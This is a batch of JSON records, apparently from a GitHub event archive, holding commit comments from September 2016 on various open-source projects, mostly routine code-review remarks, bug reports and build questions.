{"id":"4560854001","type":"CommitCommentEvent","actor":{"login":"olecrivain"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19015156,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T09:32:09Z","updated_at":"2016-09-14T09:32:09Z","body":"Since this release, node-newrelic requires npm v3+!\r\n\r\nI have the following error with npm v2.14 :\r\n```\r\nmodule.js:340\r\n    throw err;\r\n    ^\r\n\r\nError: Cannot find module 'core-util-is'\r\n    at Function.Module._resolveFilename (module.js:338:15)\r\n    at Function.Module._load (module.js:289:25)\r\n    at Module.require (module.js:366:17)\r\n    at require (module.js:385:17)\r\n    at Object.<anonymous> (/opt/applications/SncfFusionIdCab/build/node_modules/newrelic/node_modules/readable-stream/lib/_stream_readable.js:46:12)\r\n```\r\n\r\nIt think it would be better to support at least node v4 & npm v2.\r\n"}},"created_at":"2016-09-14T09:32:09Z"}
{"id":"4560855909","type":"CommitCommentEvent","actor":{"login":"adamniedzielski"},"repo":{"name":"jackkinsella/confessions"},"payload":{"comment":{"id":19015162,"position":4,"line":11,"path":"app/controllers/books_controller.rb","commit_id":"a11d81d8106b57f680a79fe4858dd9118b54e16d","created_at":"2016-09-14T09:32:32Z","updated_at":"2016-09-14T09:32:32Z","body":"Do we need this as a separate method? I believe that we can still manage to have a single method for displaying a book and rely on partials. Alternatively, we could agree that we create a separate action for each book (as the landing pages may be entirely different) and then delete the generic `show` action."}},"created_at":"2016-09-14T09:32:32Z"}
{"id":"4560856005","type":"CommitCommentEvent","actor":{"login":"rrrene"},"repo":{"name":"rrrene/credo"},"payload":{"comment":{"id":19015163,"position":16,"line":47,"path":"lib/credo/cli/output/summary.ex","commit_id":"2c51773767fb4438403c4a6fac7422bbeba99c51","created_at":"2016-09-14T09:32:33Z","updated_at":"2016-09-14T09:32:33Z","body":"Probably a good idea. :sweat_smile: "}},"created_at":"2016-09-14T09:32:33Z"}
{"id":"4560857487","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19015164,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-14T09:32:53Z","updated_at":"2016-09-14T09:32:53Z","body":"Well the udev rules might be part of upstream. Specific to all Linux\ndistros.\n"}},"created_at":"2016-09-14T09:32:53Z"}
{"id":"4560857649","type":"CommitCommentEvent","actor":{"login":"tkrajcar"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19015165,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T09:32:55Z","updated_at":"2016-09-14T09:32:55Z","body":"@olecrivain We have unpublished version 1.30.2, please run 1.30.1 for now and we'll have a new version posted soon!"}},"created_at":"2016-09-14T09:32:55Z"}
{"id":"4560861349","type":"CommitCommentEvent","actor":{"login":"drna3r"},"repo":{"name":"drna3r/IS-Dashboard"},"payload":{"comment":{"id":19015173,"position":null,"line":null,"path":null,"commit_id":"a31aae52f5aa840bb223e3dce9f6ede705482396","created_at":"2016-09-14T09:33:43Z","updated_at":"2016-09-14T09:33:43Z","body":"nasser and hosseyn bolded..!"}},"created_at":"2016-09-14T09:33:43Z"}
{"id":"4560861818","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":19015174,"position":28,"line":24,"path":"SEO/BLL/CrawlManager.cs","commit_id":"97e407ff4143fbbb53d06f8c44c8960ae10ebb4e","created_at":"2016-09-14T09:33:48Z","updated_at":"2016-09-14T09:33:48Z","body":"Why do you need this Select? you can just AddRange(result)"}},"created_at":"2016-09-14T09:33:48Z"}
{"id":"4560862464","type":"CommitCommentEvent","actor":{"login":"RudyMeijer"},"repo":{"name":"RudyMeijer/tcp"},"payload":{"comment":{"id":19015178,"position":null,"line":null,"path":null,"commit_id":"bb85109b481869fdefd0a8ee226a83ee5595f96b","created_at":"2016-09-14T09:33:57Z","updated_at":"2016-09-14T09:33:57Z","body":"clear TCP/IP buffer."}},"created_at":"2016-09-14T09:33:57Z"}
{"id":"4560862974","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":19015181,"position":38,"line":30,"path":"SEO/BLL/CrawlManager.cs","commit_id":"97e407ff4143fbbb53d06f8c44c8960ae10ebb4e","created_at":"2016-09-14T09:34:05Z","updated_at":"2016-09-14T09:34:05Z","body":"put the name crawl instead of docCrawls"}},"created_at":"2016-09-14T09:34:05Z"}
{"id":"4560863055","type":"CommitCommentEvent","actor":{"login":"foghina"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19015182,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-14T09:34:05Z","updated_at":"2016-09-14T09:34:05Z","body":"You shouldn't have to remove any `@Override`. You should be able to compile against the newest RN but run on older RN. This is how Android works as well: you always compile against the newest SDK but put runtime checks in to ensure compatibility with older versions. In this case that would be implementing the old callback to simply call the new one."}},"created_at":"2016-09-14T09:34:05Z"}
{"id":"4560866232","type":"CommitCommentEvent","actor":{"login":"foghina"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19015189,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-14T09:34:44Z","updated_at":"2016-09-14T09:34:44Z","body":"I wouldn't worry about it though, I'd just make it work with the latest RN only and if people aren't willing to upgrade they can use the older version of your library as well."}},"created_at":"2016-09-14T09:34:44Z"}
{"id":"4560867902","type":"CommitCommentEvent","actor":{"login":"daschuer"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":19015195,"position":83,"line":354,"path":"src/sources/soundsourceffmpeg.cpp","commit_id":"6b9cc94a46a850252c2961b86d4a5e170874f8c9","created_at":"2016-09-14T09:35:08Z","updated_at":"2016-09-14T09:35:08Z","body":"Why the old  frameCount here relevant? "}},"created_at":"2016-09-14T09:35:08Z"}
{"id":"4560869142","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":19015201,"position":52,"line":34,"path":"SEO/BLL/CrawlManager.cs","commit_id":"97e407ff4143fbbb53d06f8c44c8960ae10ebb4e","created_at":"2016-09-14T09:35:23Z","updated_at":"2016-09-14T09:35:23Z","body":"wrong condition: docIPs can can be xxx.xxx.xxx and visitInfo.IPAddress is xxx.xxx.xxx.xxx"}},"created_at":"2016-09-14T09:35:23Z"}
{"id":"4560869144","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":19015200,"position":52,"line":34,"path":"SEO/BLL/CrawlManager.cs","commit_id":"97e407ff4143fbbb53d06f8c44c8960ae10ebb4e","created_at":"2016-09-14T09:35:23Z","updated_at":"2016-09-14T09:35:23Z","body":"wrong condition: docIPs can can be xxx.xxx.xxx and visitInfor.IPAddress is xxx.xxx.xxx.xxx"}},"created_at":"2016-09-14T09:35:23Z"}
{"id":"4560871545","type":"CommitCommentEvent","actor":{"login":"olecrivain"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19015206,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-14T09:35:52Z","updated_at":"2016-09-14T09:35:52Z","body":"Ok thanks :)\r\n"}},"created_at":"2016-09-14T09:35:52Z"}
{"id":"4560875135","type":"CommitCommentEvent","actor":{"login":"vsiivola"},"repo":{"name":"vsiivola/variKN"},"payload":{"comment":{"id":19015209,"position":null,"line":null,"path":null,"commit_id":"1deec0bc6748f1711bc34163ca1a5afc465dba37","created_at":"2016-09-14T09:36:38Z","updated_at":"2016-09-14T09:36:38Z","body":"At glance, I don't see any problems - I guess you would have noticed those in your tests anyway. Running without prune target still works, I assume?\r\n\r\nLet me know if you feel like this is ready for merge, I don't have any objections."}},"created_at":"2016-09-14T09:36:38Z"}
{"id":"4560883962","type":"CommitCommentEvent","actor":{"login":"psmit"},"repo":{"name":"vsiivola/variKN"},"payload":{"comment":{"id":19015231,"position":null,"line":null,"path":null,"commit_id":"1deec0bc6748f1711bc34163ca1a5afc465dba37","created_at":"2016-09-14T09:38:26Z","updated_at":"2016-09-14T09:38:26Z","body":"I'm still testing the actual algorithm on real-size models. The previous version was overshooting sometimes. I'll let you know when I think it is stable\r\n"}},"created_at":"2016-09-14T09:38:26Z"}
{"id":"4560900319","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19015264,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-14T09:41:45Z","updated_at":"2016-09-14T09:41:45Z","body":"I mainly asked for simpler solution than sudo/dialout and I think that upstream developers have the biggest knowledge.\r\n\r\nesp-udev-rules is just suggestion/note if nobody has a better idea."}},"created_at":"2016-09-14T09:41:45Z"}
{"id":"4560901160","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19015267,"position":15,"line":15,"path":"src/org/vitrivr/cineast/core/db/NeuralNetLookup.java","commit_id":"800af9a5026a4094620fcc2304f0dcb8b6454cd5","created_at":"2016-09-14T09:41:55Z","updated_at":"2016-09-14T09:41:55Z","body":"I frankly don't understand why you would need something like this..."}},"created_at":"2016-09-14T09:41:55Z"}
{"id":"4560903249","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19015274,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-14T09:42:21Z","updated_at":"2016-09-14T09:42:21Z","body":"And everyting goes on if I comment the line7 of schedule.php \r\n\r\n> $event_common_db->execute_query('ATTACH DATABASE `data/event/marathon.db_` AS marathon');"}},"created_at":"2016-09-14T09:42:21Z"}
{"id":"4560906503","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19015294,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T09:42:59Z","updated_at":"2016-09-14T09:42:59Z","body":"The Legendary Voyager1!!!!111!!!!"}},"created_at":"2016-09-14T09:42:59Z"}
{"id":"4560906696","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19015295,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-14T09:43:02Z","updated_at":"2016-09-14T09:43:02Z","body":"minetest.get_node ↑ either returns a table or it crashes due to wrong argument\r\n\r\nWhat is the meaning of testing if under exists?"}},"created_at":"2016-09-14T09:43:02Z"}
{"id":"4560910277","type":"CommitCommentEvent","actor":{"login":"dreispt"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":19015303,"position":null,"line":null,"path":null,"commit_id":"ee76f1adcbf4d3a07f764f22442a79245e766088","created_at":"2016-09-14T09:43:46Z","updated_at":"2016-09-14T09:43:46Z","body":"What's the worst that could happen if a malicious site makes calls on this endpoint?"}},"created_at":"2016-09-14T09:43:46Z"}
{"id":"4560911940","type":"CommitCommentEvent","actor":{"login":"jbguerraz"},"repo":{"name":"rundeck/rundeck"},"payload":{"comment":{"id":19015312,"position":60,"line":53,"path":"packaging/Makefile","commit_id":"cabe19c5efd7a44d97348a8031fb136152b2bd4e","created_at":"2016-09-14T09:44:09Z","updated_at":"2016-09-14T09:44:09Z","body":"I'm actually working on providing rundeck to alpine linux. I wonder why a \"ln\"' in 2 steps instead of one; is there a reason I miss ?"}},"created_at":"2016-09-14T09:44:09Z"}
{"id":"4560914400","type":"CommitCommentEvent","actor":{"login":"ahuarte47"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19015317,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-14T09:44:36Z","updated_at":"2016-09-14T09:44:36Z","body":"It builds successfully too!"}},"created_at":"2016-09-14T09:44:36Z"}
{"id":"4560916931","type":"CommitCommentEvent","actor":{"login":"kmaheshr"},"repo":{"name":"mahesh11022/ACSS_TEST"},"payload":{"comment":{"id":19015321,"position":null,"line":null,"path":null,"commit_id":"212d546371caf3d679873d391d85420bb9a81a59","created_at":"2016-09-14T09:45:11Z","updated_at":"2016-09-14T09:45:11Z","body":"next"}},"created_at":"2016-09-14T09:45:11Z"}
{"id":"4560917853","type":"CommitCommentEvent","actor":{"login":"zjykymt"},"repo":{"name":"zjykymt/freertos-stm32"},"payload":{"comment":{"id":19015323,"position":null,"line":null,"path":null,"commit_id":"10174dceb4e16dd31a2354a22e0e35a45bf4b1f0","created_at":"2016-09-14T09:45:22Z","updated_at":"2016-09-14T09:45:22Z","body":"1、修复freeModbus对于发送和接收的超时时间导致9600波特率下出错\r\n2、新增更合理的Print调试打印\r\n===========下一步===========\r\n1、准备修复freeModbus定时器和重组代码\r\n2、对于读取逆变器的数据加以更好的处理\r\n"}},"created_at":"2016-09-14T09:45:22Z"}
{"id":"4560920166","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19015325,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-14T09:45:49Z","updated_at":"2016-09-14T09:45:49Z","body":"![Szeptember 14. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473664774)\nNyírségi gombócleves\r\nRozmaringos csirkecomb velesült hagymás burgonyával\r\nFrancia mákos krémes"}},"created_at":"2016-09-14T09:45:49Z"}
{"id":"4560928633","type":"CommitCommentEvent","actor":{"login":"jbguerraz"},"repo":{"name":"rundeck/rundeck"},"payload":{"comment":{"id":19015347,"position":58,"line":51,"path":"packaging/Makefile","commit_id":"cabe19c5efd7a44d97348a8031fb136152b2bd4e","created_at":"2016-09-14T09:47:34Z","updated_at":"2016-09-14T09:47:34Z","body":"Hello. I'm wondering why -regex \".*.bat$$\" and not -name \"*.bat\". Is there a good reason I'd miss ? (I'm working on providing rundeck to alpine linux now)"}},"created_at":"2016-09-14T09:47:34Z"}
{"id":"4560930719","type":"CommitCommentEvent","actor":{"login":"ludolphus"},"repo":{"name":"mpociot/TiCollectionView"},"payload":{"comment":{"id":19015349,"position":64,"line":64,"path":"iphone/DeMarcelpociotSearchDisplayController.m","commit_id":"185850e0449757a2bf3e5571e14c73bf95cf3656","created_at":"2016-09-14T09:48:01Z","updated_at":"2016-09-14T09:48:01Z","body":"This line, the reference to scrollEnabled specifically, caused an app to be rejected by Apple last week. It got marked as using a Private API.\r\n\r\n I removed the if code block and rebuilt the module and resubmitted the app to Apple and it was approved yesterday.\r\n\r\nI guess they don't like the conversion of a UIView (does not officially have scrollEnabled) to UIScrollView (does have the scrollEnabled property).\r\n"}},"created_at":"2016-09-14T09:48:01Z"}
{"id":"4560935079","type":"CommitCommentEvent","actor":{"login":"ankon"},"repo":{"name":"brennan-collins/flyway"},"payload":{"comment":{"id":19015366,"position":1,"line":1,"path":"flyway-sample-mongodb/README.md~","commit_id":"ef4e53a3f171fee97738d2555db8e5cda920cca8","created_at":"2016-09-14T09:48:58Z","updated_at":"2016-09-14T09:48:58Z","body":"This looks like a backup file, and should be removable."}},"created_at":"2016-09-14T09:48:58Z"}
{"id":"4560939662","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19015380,"position":null,"line":null,"path":null,"commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-14T09:49:56Z","updated_at":"2016-09-14T09:49:56Z","body":"Sounds good. This is definitely going in the right direction and looking forward to the next round of changes."}},"created_at":"2016-09-14T09:49:56Z"}
{"id":"4560943822","type":"CommitCommentEvent","actor":{"login":"ankon"},"repo":{"name":"brennan-collins/flyway"},"payload":{"comment":{"id":19015393,"position":13,"line":13,"path":"flyway-sample-mongodb/README.md","commit_id":"ef4e53a3f171fee97738d2555db8e5cda920cca8","created_at":"2016-09-14T09:50:49Z","updated_at":"2016-09-14T09:50:49Z","body":"This command didn't work for me: nothing produces the target/dependency directory.\r\n\r\nInstead of trying further in this direction, you could just use the exec maven plugin: `mvn exec:java -Dexec.mainClass=org.flywaydb.sample.mongodb.Main -pl flyway-sample-mongodb`"}},"created_at":"2016-09-14T09:50:49Z"}
{"id":"4560948755","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19015408,"position":5,"line":5,"path":"directantic/app/components/Breadcrumbs.php","commit_id":"74898b57b3a3579823f80b00ec01495041aa363c","created_at":"2016-09-14T09:51:49Z","updated_at":"2016-09-14T09:51:49Z","body":"Я смотрел на него, но не сообразил как его заставить работать в полуавтоматическом режиме.."}},"created_at":"2016-09-14T09:51:49Z"}
{"id":"4560949148","type":"CommitCommentEvent","actor":{"login":"bogdan"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":19015409,"position":5,"line":33,"path":"source/saas.rst","commit_id":"356ae6e6d196adf935070c54e2af2c134e60b0cb","created_at":"2016-09-14T09:51:54Z","updated_at":"2016-09-14T09:51:54Z","body":"Why is it plural?"}},"created_at":"2016-09-14T09:51:54Z"}
{"id":"4560950260","type":"CommitCommentEvent","actor":{"login":"cyphar"},"repo":{"name":"opencontainers/runc"},"payload":{"comment":{"id":19015415,"position":26,"line":321,"path":"libcontainer/init_linux.go","commit_id":"5caf3898aedfd6d1a32d25b3849258d8488b9e90","created_at":"2016-09-14T09:52:09Z","updated_at":"2016-09-14T09:52:09Z","body":"The reason that we have to change the owner is so that if the process is started with another UID then they can control their console (that's why this code exists in the first place). I'm on the fence about how much we need to do here -- but not changing the group is \"good enough\" IMO (it handles all of the standard uses of `devpts` as well as all of the different mapping combinations you can have). Though I am, of course, open to discussion about nicer ways of solving this issue."}},"created_at":"2016-09-14T09:52:09Z"}
{"id":"4560953901","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/tutu"},"payload":{"comment":{"id":19015421,"position":1,"line":1,"path":".idea/runConfigurations/Development__tutu.xml","commit_id":"829497d92f9910bc6b794b64c85d2c8d51e21ee4","created_at":"2016-09-14T09:52:53Z","updated_at":"2016-09-14T09:52:53Z","body":"Папку .ideа удали из репозитория и добавь в .gitignore, чтобы она больше не попадала сюда. Эта папка хранит настройки RubyMine, а если говорить о командной разработке, то эти настройки могут быть разными у разных разработчиков. Поэтому все, что специфично для конкретного разработчика, по хорошему, не должно присутствовать в репо."}},"created_at":"2016-09-14T09:52:53Z"}
{"id":"4560954472","type":"CommitCommentEvent","actor":{"login":"antread"},"repo":{"name":"antread/Testing-Jira"},"payload":{"comment":{"id":19015423,"position":null,"line":null,"path":null,"commit_id":"d4924c5ccc8e6291dd63f1e0c9e33d49cb52734c","created_at":"2016-09-14T09:53:01Z","updated_at":"2016-09-14T09:53:01Z","body":"TJ-001"}},"created_at":"2016-09-14T09:53:01Z"}
{"id":"4560954895","type":"CommitCommentEvent","actor":{"login":"palitraining"},"repo":{"name":"palitraining/yii11BKLCP59"},"payload":{"comment":{"id":19015426,"position":2,"line":2,"path":"README.md","commit_id":"dbeb711c9d84f003ff4c33071e831fc821cd6b2c","created_at":"2016-09-14T09:53:08Z","updated_at":"2016-09-14T09:53:08Z","body":"Create Project in yii11BKLCP59/yii11/app"}},"created_at":"2016-09-14T09:53:08Z"}
{"id":"4560954980","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19015427,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T09:53:09Z","updated_at":"2016-09-14T09:53:09Z","body":"@snicolet Your test has in fact another bench number than Marco's one and seem to resist much more at SPRT[-3,1] \r\nDoes this mean that we are actually calling SEE on illegal moves (not-evasion moves when we are in check)? "}},"created_at":"2016-09-14T09:53:09Z"}
{"id":"4560958642","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19015434,"position":null,"line":null,"path":null,"commit_id":"3f31956c7bccb9c7989fd2b9c97fe56d0b59d2cf","created_at":"2016-09-14T09:53:56Z","updated_at":"2016-09-14T09:53:56Z","body":"это весь патч ? мало изменений или так и должно быть"}},"created_at":"2016-09-14T09:53:56Z"}
{"id":"4560959195","type":"CommitCommentEvent","actor":{"login":"Nicklas373"},"repo":{"name":"spezi77/hellspawn-N4"},"payload":{"comment":{"id":19015436,"position":null,"line":null,"path":null,"commit_id":"a474b5463618997f8401b4a556bfd670a46e796a","created_at":"2016-09-14T09:54:03Z","updated_at":"2016-09-14T09:54:03Z","body":"Same, always happen on me too. that script sometime added by itself -_- "}},"created_at":"2016-09-14T09:54:03Z"}
{"id":"4560960015","type":"CommitCommentEvent","actor":{"login":"ndechesne"},"repo":{"name":"cpriouzeau/meta-st-cannes2"},"payload":{"comment":{"id":19015438,"position":8,"line":25,"path":"conf/machine/stih410-b2260.conf","commit_id":"8e980f6e3974c93c83481bfe7b71684e31c94df6","created_at":"2016-09-14T09:54:14Z","updated_at":"2016-09-14T09:54:14Z","body":"this line is not needed. in fact if bluez5 is in DISTRO_FEATURES, bluez5 will be automatically added to the image. \r\n\r\nwhat I had in mind was to install the BT firmware *only* if bluez5 is in DISTRO_FEATURES."}},"created_at":"2016-09-14T09:54:14Z"}
{"id":"4560963680","type":"CommitCommentEvent","actor":{"login":"Tonkonozhenko"},"repo":{"name":"talkable/talkable-docs"},"payload":{"comment":{"id":19015446,"position":5,"line":33,"path":"source/saas.rst","commit_id":"356ae6e6d196adf935070c54e2af2c134e60b0cb","created_at":"2016-09-14T09:54:57Z","updated_at":"2016-09-14T09:54:57Z","body":"I don't know. I think @iurevych can know this. I've just modified because it's a second time when customer copies this code and gets error."}},"created_at":"2016-09-14T09:54:57Z"}
{"id":"4560964068","type":"CommitCommentEvent","actor":{"login":"DamasClasicas"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19015447,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T09:55:02Z","updated_at":"2016-09-14T09:55:02Z","body":" Amazing VoyagerOne! Congratulations!!"}},"created_at":"2016-09-14T09:55:02Z"}
{"id":"4560964378","type":"CommitCommentEvent","actor":{"login":"satyamp"},"repo":{"name":"meeeejin/group-play-service"},"payload":{"comment":{"id":19015448,"position":null,"line":null,"path":null,"commit_id":"223241352e554b13e95cf55072e90bd3ca1942cc","created_at":"2016-09-14T09:55:07Z","updated_at":"2016-09-14T09:55:07Z","body":"how i can build it in windows.'\r\ncan you please share the information"}},"created_at":"2016-09-14T09:55:07Z"}
{"id":"4560964491","type":"CommitCommentEvent","actor":{"login":"preiyah"},"repo":{"name":"preiyah/coursera-test"},"payload":{"comment":{"id":19015449,"position":null,"line":null,"path":null,"commit_id":"04dcd0912162a410148dfda5e441a4ecc70f5b5a","created_at":"2016-09-14T09:55:09Z","updated_at":"2016-09-14T09:55:09Z","body":"not reqd"}},"created_at":"2016-09-14T09:55:09Z"}
{"id":"4560965070","type":"CommitCommentEvent","actor":{"login":"xuanbka1"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19015450,"position":null,"line":null,"path":null,"commit_id":"d1d0b380844c6c52e23ebb36e2dc53258a722531","created_at":"2016-09-14T09:55:15Z","updated_at":"2016-09-14T09:55:15Z","body":"mấy cái thư viện tự tạo thì nó add vào chỗ nào anh Sơn"}},"created_at":"2016-09-14T09:55:15Z"}
{"id":"4560968081","type":"CommitCommentEvent","actor":{"login":"carolinux"},"repo":{"name":"xavfernandez/pip"},"payload":{"comment":{"id":19015457,"position":null,"line":null,"path":null,"commit_id":"16f4cc3387a9d92c860c91a19b27cb4ab72e68f5","created_at":"2016-09-14T09:55:51Z","updated_at":"2016-09-14T09:55:51Z","body":"amen"}},"created_at":"2016-09-14T09:55:51Z"}
{"id":"4560968534","type":"CommitCommentEvent","actor":{"login":"mjh1999"},"repo":{"name":"mjh1999/TG_bot"},"payload":{"comment":{"id":19015461,"position":null,"line":null,"path":null,"commit_id":"57ee3a19952ccf1b20b7ad66bd586db0f7171491","created_at":"2016-09-14T09:55:57Z","updated_at":"2016-09-14T09:55:57Z","body":"1"}},"created_at":"2016-09-14T09:55:57Z"}
{"id":"4560970286","type":"CommitCommentEvent","actor":{"login":"mjh1999"},"repo":{"name":"mjh1999/TG_bot"},"payload":{"comment":{"id":19015466,"position":null,"line":null,"path":null,"commit_id":"57ee3a19952ccf1b20b7ad66bd586db0f7171491","created_at":"2016-09-14T09:56:18Z","updated_at":"2016-09-14T09:56:18Z","body":"125593689"}},"created_at":"2016-09-14T09:56:18Z"}
{"id":"4560973319","type":"CommitCommentEvent","actor":{"login":"AdamJDuncan"},"repo":{"name":"nasa/RHEAS"},"payload":{"comment":{"id":19015477,"position":null,"line":null,"path":null,"commit_id":"633dff180c9d7d3affb051c28c952a850ab7344d","created_at":"2016-09-14T09:56:58Z","updated_at":"2016-09-14T09:56:58Z","body":"When running a nowcast over long time periods (7+ years), this change to vic.py causes the popen argument to be too long for my OS (14.04 on server with good specs) so I had to change it back. Example:\r\n\r\n```\r\nTraceback (most recent call last):\r\n  File \"./rheas\", line 16, in <module>\r\n    sys.exit(rheas.run())\r\n  File \"/home/ubuntu14/RHEAS/src/rheas.py\", line 89, in run\r\n    nowcast.execute(dbname, options)\r\n  File \"/home/ubuntu14/RHEAS/src/nowcast.py\", line 193, in execute\r\n    runVIC(dbname, options)\r\n  File \"/home/ubuntu14/RHEAS/src/nowcast.py\", line 30, in runVIC\r\n    runDeterministicVIC(dbname, options)\r\n  File \"/home/ubuntu14/RHEAS/src/nowcast.py\", line 79, in runDeterministicVIC\r\n    model.save(saveto, savevars)\r\n  File \"/home/ubuntu14/RHEAS/src/vic/vic.py\", line 598, in save\r\n    \"date\"], \"{0}\".format(var), initialize, skipsave=skipsave)\r\n  File \"/home/ubuntu14/RHEAS/src/vic/vic.py\", line 556, in writeToDB\r\n    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\r\n  File \"/usr/lib/python2.7/subprocess.py\", line 710, in __init__\r\n    errread, errwrite)\r\n  File \"/usr/lib/python2.7/subprocess.py\", line 1327, in _execute_child\r\n    raise child_exception\r\nOSError: [Errno 7] Argument list too long\r\n```"}},"created_at":"2016-09-14T09:56:58Z"}
{"id":"4560979796","type":"CommitCommentEvent","actor":{"login":"mpflanzer"},"repo":{"name":"csmith-project/creduce"},"payload":{"comment":{"id":19015484,"position":null,"line":null,"path":null,"commit_id":"ff88903d79f9a4ec0e004e2d10be15de7cb370ba","created_at":"2016-09-14T09:58:18Z","updated_at":"2016-09-14T09:58:18Z","body":"I did like the concept of `advance_on_success` to keep the `transform` function simple. But I also used it in a slightly more sensible way in my Python version than just to return a copy of the state.\r\n\r\nBasically, I always (well, for most transformations) search for the next state in the `advance` and `advance_on_success` functions. The transform function then just takes the state and applies the transformation without having to deduce the next state from the one passed into the function.\r\n\r\nFor instance, imagine a transformation that deletes `BAR` from the following input file:\r\n```\r\nEXAMPLE FOOBAR FOOBAR\r\n```\r\n\r\nIn my Python version the steps would be:\r\n\r\n1. `new` intitialises state with 8 (position of first `FOO`)\r\n2. `transform` checks that state points to a valid position and does the transformation.\r\n```\r\nEXAMPLE BAR FOOBAR\r\n```\r\n3. `advance_on_success` advances state to 12 (position of next `FOO` after old state)\r\n4. `transform` checks that state points to a valid position and does the transformation.\r\n\r\n`advance` does basically the same thing but looks for the next position after \"state + 1\" to skip the unsuccessful state.\r\n\r\nDoes that make sense to decouple searching for the next possible state and applying the transformation? "}},"created_at":"2016-09-14T09:58:18Z"}
{"id":"4560986388","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":19015495,"position":9,"line":51,"path":"connector_prestashop/models/stock.py","commit_id":"02f7fee56bda9254354f6498384137f3e2340193","created_at":"2016-09-14T09:59:36Z","updated_at":"2016-09-14T09:59:36Z","body":"Do:\r\n```\r\nself.filtered(lambda x: x.location_id in ps_locations).mapped('product_id').update_prestashop_qty()\r\n```\r\nBetter code and less calls to the update method."}},"created_at":"2016-09-14T09:59:36Z"}
{"id":"4565353788","type":"CommitCommentEvent","actor":{"login":"boingoing"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19028718,"position":4,"line":4,"path":"src/node_jsvmapi_types.h","commit_id":"d167e60950ea4219228acd54a30702540f77953a","created_at":"2016-09-15T00:00:07Z","updated_at":"2016-09-15T00:00:07Z","body":"This is only needed internally for our cc file, right? Can we move it there?"}},"created_at":"2016-09-15T00:00:07Z"}
